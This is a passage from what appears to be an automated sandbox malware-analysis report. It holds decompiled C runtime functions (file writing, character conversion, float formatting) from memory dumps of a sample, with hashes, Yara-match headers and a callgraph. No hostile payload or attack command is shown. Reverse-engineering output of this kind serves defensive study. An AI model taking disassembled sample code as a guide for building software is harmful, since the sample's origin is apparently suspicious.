                              											}
                              											goto L39;
                              										}
                              									} else {
                              										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                              										_t57 = _t55 + 4;
                              										_t53[0x11] = _t30;
                              										if(_t30 == 0) {
                              											goto L39;
                              										} else {
                              											E0040BA30(_t48, _t30, 0, 0x4000);
                              											_t55 = _t57 + 0xc;
                              											goto L11;
                              										}
                              									}
                              								}
                              							}
                              						}
                              					}
                              				}
                              				L41:
                              			}



















                              0x00405d00
                              0x00405d00
                              0x00405d00
                              0x00405d01
                              0x00405d07
                              0x00405e7f
                              0x00405e7f
                              0x00405e7f
                              0x00405e83
                              0x00405d0d
                              0x00405d0d
                              0x00405d14
                              0x00000000
                              0x00405d1a
                              0x00405d1a
                              0x00405d20
                              0x00000000
                              0x00405d2f
                              0x00405d34
                              0x00405d38
                              0x00405dad
                              0x00405db0
                              0x00405db2
                              0x00405db2
                              0x00405db2
                              0x00405db5
                              0x00405db7
                              0x00000000
                              0x00405dbd
                              0x00405dbd
                              0x00405dc1
                              0x00405df8
                              0x00405dfb
                              0x00405dfd
                              0x00405e04
                              0x00405e09
                              0x00405e0c
                              0x00405e0e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00405dff
                              0x00405dff
                              0x00405e10
                              0x00405e10
                              0x00405e12
                              0x00405e73
                              0x00405e78
                              0x00405e14
                              0x00405e14
                              0x00405e18
                              0x00405e2e
                              0x00405e2e
                              0x00405e32
                              0x00405e34
                              0x00405e37
                              0x00405e38
                              0x00405e3c
                              0x00405e43
                              0x00405e45
                              0x00405e45
                              0x00405e43
                              0x00405e4c
                              0x00405e4e
                              0x00000000
                              0x00405e50
                              0x00405e50
                              0x00405e50
                              0x00405e55
                              0x00405e57
                              0x00405e59
                              0x00405e59
                              0x00405e61
                              0x00405e66
                              0x00405e69
                              0x00405e6b
                              0x00000000
                              0x00000000
                              0x00405e6d
                              0x00405e6f
                              0x00405e71
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00405e71
                              0x00000000
                              0x00405e50
                              0x00405e1a
                              0x00405e1f
                              0x00405e24
                              0x00405e27
                              0x00405e2a
                              0x00405e2c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00405e2c
                              0x00405e18
                              0x00405e12
                              0x00405dc3
                              0x00405dc9
                              0x00405dcb
                              0x00405dcc
                              0x00405dcd
                              0x00405dd4
                              0x00405ddb
                              0x00405ddd
                              0x00405de5
                              0x00405de7
                              0x00000000
                              0x00405ded
                              0x00405ded
                              0x00405df0
                              0x00405df7
                              0x00405df7
                              0x00405de7
                              0x00405dc1
                              0x00405d3a
                              0x00405d3c
                              0x00405d3e
                              0x00405d3e
                              0x00405d43
                              0x00405e79
                              0x00405e7a
                              0x00405e7a
                              0x00405e7e
                              0x00405d49
                              0x00405d4d
                              0x00405d77
                              0x00405d79
                              0x00405da7
                              0x00405dac
                              0x00405d7b
                              0x00405d80
                              0x00405d80
                              0x00405d87
                              0x00405d89
                              0x00405d89
                              0x00405d91
                              0x00405d96
                              0x00405d9b
                              0x00000000
                              0x00000000
                              0x00405da1
                              0x00405da5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00405da5
                              0x00000000
                              0x00405d80
                              0x00405d4f
                              0x00405d54
                              0x00405d59
                              0x00405d5c
                              0x00405d61
                              0x00000000
                              0x00405d67
                              0x00405d6f
                              0x00405d74
                              0x00000000
                              0x00405d74
                              0x00405d61
                              0x00405d4d
                              0x00405d43
                              0x00405d38
                              0x00405d20
                              0x00405d14
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: _fseek_malloc_memset
                              • String ID:
                              • API String ID: 208892515-0
                              • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                              • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                              • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                              • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
                              			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                              				signed int _v8;
                              				signed int _v12;
                              				signed int _v16;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed int _t59;
                              				intOrPtr* _t61;
                              				signed int _t63;
                              				void* _t68;
                              				signed int _t69;
                              				signed int _t72;
                              				signed int _t74;
                              				signed int _t75;
                              				signed int _t77;
                              				signed int _t78;
                              				signed int _t81;
                              				signed int _t82;
                              				signed int _t84;
                              				signed int _t88;
                              				signed int _t97;
                              				signed int _t98;
                              				signed int _t99;
                              				intOrPtr* _t100;
                              				void* _t101;
                              
                              				_t90 = __edx;
                              				if(_a8 == 0 || _a12 == 0) {
                              					L4:
                              					return 0;
                              				} else {
                              					_t100 = _a16;
                              					_t105 = _t100;
                              					if(_t100 != 0) {
                              						_t82 = _a4;
                              						__eflags = _t82;
                              						if(__eflags == 0) {
                              							goto L3;
                              						}
                              						_t63 = _t59 | 0xffffffff;
                              						_t90 = _t63 % _a8;
                              						__eflags = _a12 - _t63 / _a8;
                              						if(__eflags > 0) {
                              							goto L3;
                              						}
                              						_t97 = _a8 * _a12;
                              						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                              						_v8 = _t82;
                              						_v16 = _t97;
                              						_t81 = _t97;
                              						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                              							_v12 = 0x1000;
                              						} else {
                              							_v12 =  *(_t100 + 0x18);
                              						}
                              						__eflags = _t97;
                              						if(_t97 == 0) {
                              							L32:
                              							return _a12;
                              						} else {
                              							do {
                              								_t84 =  *(_t100 + 0xc) & 0x00000108;
                              								__eflags = _t84;
                              								if(_t84 == 0) {
                              									L18:
                              									__eflags = _t81 - _v12;
                              									if(_t81 < _v12) {
                              										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                              										__eflags = _t68 - 0xffffffff;
                              										if(_t68 == 0xffffffff) {
                              											L34:
                              											_t69 = _t97;
                              											L35:
                              											return (_t69 - _t81) / _a8;
                              										}
                              										_v8 = _v8 + 1;
                              										_t72 =  *(_t100 + 0x18);
                              										_t81 = _t81 - 1;
                              										_v12 = _t72;
                              										__eflags = _t72;
                              										if(_t72 <= 0) {
                              											_v12 = 1;
                              										}
                              										goto L31;
                              									}
                              									__eflags = _t84;
                              									if(_t84 == 0) {
                              										L21:
                              										__eflags = _v12;
                              										_t98 = _t81;
                              										if(_v12 != 0) {
                              											_t75 = _t81;
                              											_t90 = _t75 % _v12;
                              											_t98 = _t98 - _t75 % _v12;
                              											__eflags = _t98;
                              										}
                              										_push(_t98);
                              										_push(_v8);
                              										_push(E0040FA20(_t90, _t98, _t100));
                              										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                              										_t101 = _t101 + 0xc;
                              										__eflags = _t74 - 0xffffffff;
                              										if(_t74 == 0xffffffff) {
                              											L36:
                              											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                              											_t69 = _v16;
                              											goto L35;
                              										} else {
                              											_t88 = _t98;
                              											__eflags = _t74 - _t98;
                              											if(_t74 <= _t98) {
                              												_t88 = _t74;
                              											}
                              											_v8 = _v8 + _t88;
                              											_t81 = _t81 - _t88;
                              											__eflags = _t74 - _t98;
                              											if(_t74 < _t98) {
                              												goto L36;
                              											} else {
                              												L27:
                              												_t97 = _v16;
                              												goto L31;
                              											}
                              										}
                              									}
                              									_t77 = E0040C1FB(_t100);
                              									__eflags = _t77;
                              									if(_t77 != 0) {
                              										goto L34;
                              									}
                              									goto L21;
                              								}
                              								_t78 =  *(_t100 + 4);
                              								__eflags = _t78;
                              								if(__eflags == 0) {
                              									goto L18;
                              								}
                              								if(__eflags < 0) {
                              									_t48 = _t100 + 0xc;
                              									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                              									__eflags =  *_t48;
                              									goto L34;
                              								}
                              								_t99 = _t81;
                              								__eflags = _t81 - _t78;
                              								if(_t81 >= _t78) {
                              									_t99 = _t78;
                              								}
                              								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                              								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                              								 *_t100 =  *_t100 + _t99;
                              								_t101 = _t101 + 0xc;
                              								_t81 = _t81 - _t99;
                              								_v8 = _v8 + _t99;
                              								goto L27;
                              								L31:
                              								__eflags = _t81;
                              							} while (_t81 != 0);
                              							goto L32;
                              						}
                              					}
                              					L3:
                              					_t61 = E0040BFC1(_t105);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					 *_t61 = 0x16;
                              					E0040E744(_t90, 0, _t100);
                              					goto L4;
                              				}
                              			}





























                              0x0040baaa
                              0x0040baba
                              0x0040bae0
                              0x00000000
                              0x0040bac1
                              0x0040bac1
                              0x0040bac4
                              0x0040bac6
                              0x0040bae7
                              0x0040baea
                              0x0040baec
                              0x00000000
                              0x00000000
                              0x0040baee
                              0x0040baf3
                              0x0040baf6
                              0x0040baf9
                              0x00000000
                              0x00000000
                              0x0040bafe
                              0x0040bb02
                              0x0040bb09
                              0x0040bb0c
                              0x0040bb0f
                              0x0040bb11
                              0x0040bb1b
                              0x0040bb13
                              0x0040bb16
                              0x0040bb16
                              0x0040bb22
                              0x0040bb24
                              0x0040bbe9
                              0x00000000
                              0x0040bb2a
                              0x0040bb2a
                              0x0040bb2d
                              0x0040bb2d
                              0x0040bb33
                              0x0040bb64
                              0x0040bb64
                              0x0040bb67
                              0x0040bbc0
                              0x0040bbc7
                              0x0040bbca
                              0x0040bbf5
                              0x0040bbf5
                              0x0040bbf7
                              0x00000000
                              0x0040bbfb
                              0x0040bbcc
                              0x0040bbcf
                              0x0040bbd2
                              0x0040bbd3
                              0x0040bbd6
                              0x0040bbd8
                              0x0040bbda
                              0x0040bbda
                              0x00000000
                              0x0040bbd8
                              0x0040bb69
                              0x0040bb6b
                              0x0040bb78
                              0x0040bb78
                              0x0040bb7c
                              0x0040bb7e
                              0x0040bb82
                              0x0040bb84
                              0x0040bb87
                              0x0040bb87
                              0x0040bb87
                              0x0040bb89
                              0x0040bb8a
                              0x0040bb94
                              0x0040bb95
                              0x0040bb9a
                              0x0040bb9d
                              0x0040bba0
                              0x0040bc03
                              0x0040bc03
                              0x0040bc07
                              0x00000000
                              0x0040bba2
                              0x0040bba2
                              0x0040bba4
                              0x0040bba6
                              0x0040bba8
                              0x0040bba8
                              0x0040bbaa
                              0x0040bbad
                              0x0040bbaf
                              0x0040bbb1
                              0x00000000
                              0x0040bbb3
                              0x0040bbb3
                              0x0040bbb3
                              0x00000000
                              0x0040bbb3
                              0x0040bbb1
                              0x0040bba0
                              0x0040bb6e
                              0x0040bb74
                              0x0040bb76
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040bb76
                              0x0040bb35
                              0x0040bb38
                              0x0040bb3a
                              0x00000000
                              0x00000000
                              0x0040bb3c
                              0x0040bbf1
                              0x0040bbf1
                              0x0040bbf1
                              0x00000000
                              0x0040bbf1
                              0x0040bb42
                              0x0040bb44
                              0x0040bb46
                              0x0040bb48
                              0x0040bb48
                              0x0040bb50
                              0x0040bb55
                              0x0040bb58
                              0x0040bb5a
                              0x0040bb5d
                              0x0040bb5f
                              0x00000000
                              0x0040bbe1
                              0x0040bbe1
                              0x0040bbe1
                              0x00000000
                              0x0040bb2a
                              0x0040bb24
                              0x0040bac8
                              0x0040bac8
                              0x0040bacd
                              0x0040bace
                              0x0040bacf
                              0x0040bad0
                              0x0040bad1
                              0x0040bad2
                              0x0040bad8
                              0x00000000
                              0x0040badd

                              APIs
                              • __flush.LIBCMT ref: 0040BB6E
                              • __fileno.LIBCMT ref: 0040BB8E
                              • __locking.LIBCMT ref: 0040BB95
                              • __flsbuf.LIBCMT ref: 0040BBC0
                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                              • String ID:
                              • API String ID: 3240763771-0
                              • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                              • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                              • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                              • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __fileno__flsbuf__flush__getptd_noexit__locking
                              • String ID:
                              • API String ID: 1291973410-0
                              • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                              • Instruction ID: 997f0f4a8cab561417d2b8887da52803a62540f98208416afc529c8b97f6cc72
                              • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                              • Instruction Fuzzy Hash: D6419632A00605EBEF249F69C8D56AEFFB5FF80720F288529E9559B1C0D770DE418B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: _fseek_malloc_memset
                              • String ID:
                              • API String ID: 208892515-0
                              • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                              • Instruction ID: 2739c68605b846c5a22944f3bc8ee9efda3b936539c0835c923c77a4735099fd
                              • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                              • Instruction Fuzzy Hash: 8B41E4B2640F124AD7308A2DA92C71F7AE5BFC0364F140A2DE5A6C67D0E771E865CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                              				char _v8;
                              				signed int _v12;
                              				char _v20;
                              				char _t43;
                              				char _t46;
                              				signed int _t53;
                              				signed int _t54;
                              				intOrPtr _t56;
                              				int _t57;
                              				int _t58;
                              				signed short* _t59;
                              				short* _t60;
                              				int _t65;
                              				char* _t72;
                              
                              				_t72 = _a8;
                              				if(_t72 == 0 || _a12 == 0) {
                              					L5:
                              					return 0;
                              				} else {
                              					if( *_t72 != 0) {
                              						E0040EC86( &_v20, _a16);
                              						_t43 = _v20;
                              						__eflags =  *(_t43 + 0x14);
                              						if( *(_t43 + 0x14) != 0) {
                              							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                              							__eflags = _t46;
                              							if(_t46 == 0) {
                              								__eflags = _a4;
                              								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                              								if(__eflags != 0) {
                              									L10:
                              									__eflags = _v8;
                              									if(_v8 != 0) {
                              										_t53 = _v12;
                              										_t11 = _t53 + 0x70;
                              										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                              										__eflags =  *_t11;
                              									}
                              									return 1;
                              								}
                              								L21:
                              								_t54 = E0040BFC1(__eflags);
                              								 *_t54 = 0x2a;
                              								__eflags = _v8;
                              								if(_v8 != 0) {
                              									_t54 = _v12;
                              									_t33 = _t54 + 0x70;
                              									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                              									__eflags =  *_t33;
                              								}
                              								return _t54 | 0xffffffff;
                              							}
                              							_t56 = _v20;
                              							_t65 =  *(_t56 + 0xac);
                              							__eflags = _t65 - 1;
                              							if(_t65 <= 1) {
                              								L17:
                              								__eflags = _a12 -  *(_t56 + 0xac);
                              								if(__eflags < 0) {
                              									goto L21;
                              								}
                              								__eflags = _t72[1];
                              								if(__eflags == 0) {
                              									goto L21;
                              								}
                              								L19:
                              								_t57 =  *(_t56 + 0xac);
                              								__eflags = _v8;
                              								if(_v8 == 0) {
                              									return _t57;
                              								}
                              								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                              								return _t57;
                              							}
                              							__eflags = _a12 - _t65;
                              							if(_a12 < _t65) {
                              								goto L17;
                              							}
                              							__eflags = _a4;
                              							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                              							__eflags = _t58;
                              							_t56 = _v20;
                              							if(_t58 != 0) {
                              								goto L19;
                              							}
                              							goto L17;
                              						}
                              						_t59 = _a4;
                              						__eflags = _t59;
                              						if(_t59 != 0) {
                              							 *_t59 =  *_t72 & 0x000000ff;
                              						}
                              						goto L10;
                              					} else {
                              						_t60 = _a4;
                              						if(_t60 != 0) {
                              							 *_t60 = 0;
                              						}
                              						goto L5;
                              					}
                              				}
                              			}

















                              0x004152a9
                              0x004152b0
                              0x004152c7
                              0x00000000
                              0x004152b7
                              0x004152b9
                              0x004152d3
                              0x004152d8
                              0x004152db
                              0x004152de
                              0x00415307
                              0x0041530e
                              0x00415310
                              0x00415391
                              0x004153ac
                              0x004153ae
                              0x004152ee
                              0x004152ee
                              0x004152f1
                              0x004152f3
                              0x004152f6
                              0x004152f6
                              0x004152f6
                              0x004152f6
                              0x00000000
                              0x004152fc
                              0x00415370
                              0x00415370
                              0x00415375
                              0x0041537b
                              0x0041537e
                              0x00415380
                              0x00415383
                              0x00415383
                              0x00415383
                              0x00415383
                              0x00000000
                              0x00415387
                              0x00415312
                              0x00415315
                              0x0041531b
                              0x0041531e
                              0x00415345
                              0x00415348
                              0x0041534e
                              0x00000000
                              0x00000000
                              0x00415350
                              0x00415353
                              0x00000000
                              0x00000000
                              0x00415355
                              0x00415355
                              0x0041535b
                              0x0041535e
                              0x004152cc
                              0x004152cc
                              0x00415367
                              0x00000000
                              0x00415367
                              0x00415320
                              0x00415323
                              0x00000000
                              0x00000000
                              0x00415327
                              0x00415338
                              0x0041533e
                              0x00415340
                              0x00415343
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00415343
                              0x004152e0
                              0x004152e3
                              0x004152e5
                              0x004152eb
                              0x004152eb
                              0x00000000
                              0x004152bb
                              0x004152bb
                              0x004152c0
                              0x004152c4
                              0x004152c4
                              0x00000000
                              0x004152c0
                              0x004152b9

                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                              • __isleadbyte_l.LIBCMT ref: 00415307
                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              • String ID:
                              • API String ID: 3058430110-0
                              • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                              • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                              • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                              • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0051553A
                              • __isleadbyte_l.LIBCMT ref: 0051556E
                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0051559F
                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0051560D
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              • String ID:
                              • API String ID: 3058430110-0
                              • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                              • Instruction ID: 4a90caebe13f6abd6af440f3e07d44b166c576c16e2fae534e45400f7e0575cf
                              • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                              • Instruction Fuzzy Hash: C8319031A10686EFEB20DF64D884AFE7FA7BF81310F164569E5658B191F730D980DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                              				intOrPtr _t25;
                              				void* _t26;
                              				void* _t28;
                              
                              				_t25 = _a16;
                              				if(_t25 == 0x65 || _t25 == 0x45) {
                              					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                              					goto L9;
                              				} else {
                              					_t34 = _t25 - 0x66;
                              					if(_t25 != 0x66) {
                              						__eflags = _t25 - 0x61;
                              						if(_t25 == 0x61) {
                              							L7:
                              							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                              						} else {
                              							__eflags = _t25 - 0x41;
                              							if(__eflags == 0) {
                              								goto L7;
                              							} else {
                              								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                              							}
                              						}
                              						L9:
                              						return _t26;
                              					} else {
                              						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                              					}
                              				}
                              			}






                              0x004134e0
                              0x004134e6
                              0x00413559
                              0x00000000
                              0x004134ed
                              0x004134ed
                              0x004134f0
                              0x0041350b
                              0x0041350e
                              0x0041352e
                              0x00413540
                              0x00413510
                              0x00413510
                              0x00413513
                              0x00000000
                              0x00413515
                              0x00413527
                              0x00413527
                              0x00413513
                              0x0041355e
                              0x00413562
                              0x004134f2
                              0x0041350a
                              0x0041350a
                              0x004134f0

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                              • String ID:
                              • API String ID: 3016257755-0
                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                              • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                              • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                              • String ID:
                              • API String ID: 3016257755-0
                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                              • Instruction ID: a1b09017023ab49a0a8c7f0ef1a9a1d5c6793d210ff91a051e3e7d0285fa293d
                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                              • Instruction Fuzzy Hash: 9B117EB200014ABBDF125E85CC69CEE3F62FB48354B588815FA1858170E232CAB1AB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Callgraph

                              • Executed
                              • Not Executed
                              • Opacity -> Relevance
                              • Disassembly available
                              callgraph 0 Function_00007FF81A1101D8 0->0 1 Function_00007FF81A110198 0->1 7 Function_00007FF81A1101E8 0->7 8 Function_00007FF81A1101A8 0->8 20 Function_00007FF81A1101B8 0->20 28 Function_00007FF81A1101C8 0->28 2 Function_00007FF81A110158 3 Function_00007FF81A110118 4 Function_00007FF81A111A1D 5 Function_00007FF81A111760 6 Function_00007FF81A111262 7->0 7->1 7->7 7->8 7->20 7->28 9 Function_00007FF81A110168 10 Function_00007FF81A110128 11 Function_00007FF81A11102C 12 Function_00007FF81A110B2D 13 Function_00007FF81A1106ED 19 Function_00007FF81A110138 13->19 14 Function_00007FF81A110A2E 15 Function_00007FF81A110070 16 Function_00007FF81A112273 17 Function_00007FF81A110C34 25 Function_00007FF81A110E02 17->25 18 Function_00007FF81A111838 18->3 18->10 29 Function_00007FF81A110108 18->29 20->0 20->1 20->7 20->8 20->20 20->28 21 Function_00007FF81A110178 22 Function_00007FF81A11223A 23 Function_00007FF81A11077D 23->14 24 Function_00007FF81A110A7E 24->2 24->3 24->9 27 Function_00007FF81A110148 24->27 26 Function_00007FF81A111188 26->3 26->10 26->29 38 Function_00007FF81A110710 26->38 28->0 28->1 28->7 28->8 28->20 28->28 30 Function_00007FF81A110188 31 Function_00007FF81A112049 32 Function_00007FF81A11108A 33 Function_00007FF81A11190A 33->2 33->3 33->21 33->27 33->30 34 Function_00007FF81A11214A 34->22 35 Function_00007FF81A1106CA 36 Function_00007FF81A11000B 37 Function_00007FF81A111B10 37->31 38->19 39 Function_00007FF81A110E52 39->11

                              Control-flow Graph

                              • Executed
                              • Not Executed
